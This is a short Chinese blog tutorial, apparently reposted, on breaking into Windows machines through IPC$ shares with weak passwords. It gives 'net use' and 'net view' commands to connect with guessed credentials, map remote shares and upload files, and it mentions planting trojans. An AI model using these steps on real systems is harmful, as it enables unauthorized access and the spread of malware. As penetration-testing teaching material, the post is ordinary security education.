zoukankan      html  css  js  c++  java
  • ipc$漏洞利用实例

    一、什么是IPC$

    IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,

    通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,

    从而实现对远程计算机的访问。

    二、如何发现系统是否存在该漏洞

    本例中所讲的IPC$漏洞缘起弱口令漏洞,使用一些弱口令扫描工具即可发现IPC$连接是否存在弱口令,例如使用Hscan工具发现弱口令问题

    三、如何利用IPC$漏洞入侵

     1.建立连接

    net use \192.168.*.*ipc$ "密码" /user:"用户名" 

     2.删除链接

    net use \192.168.*.*ipc$ /del

     3.查看目标主机是否存在共享资源

    net view \192.168.*.*

     4.映射远程共享资源到本地,本例中意为将远程主机192.168.*.*的共享资源share映射到本地的z盘

    net use z: \192.168.*.*share 

      查看系统盘符z是否已建立

     5.上传文件至该共享资源中(实际的渗透测试中可上传木马等恶意文件)

     查看是否已经复制成功

    详细命令以及说明请戳这里

  • 相关阅读:
    文件上传.py
    文件下载.py
    Visual SVN IIS反向代理设置
    开发者工具
    Linux
    装饰器
    面向对象
    django异常--数据库同步
    浅谈 Mysql
    python网络编程系列
  • 原文地址:https://www.cnblogs.com/tdcqma/p/5707954.html
Copyright © 2011-2022 走看看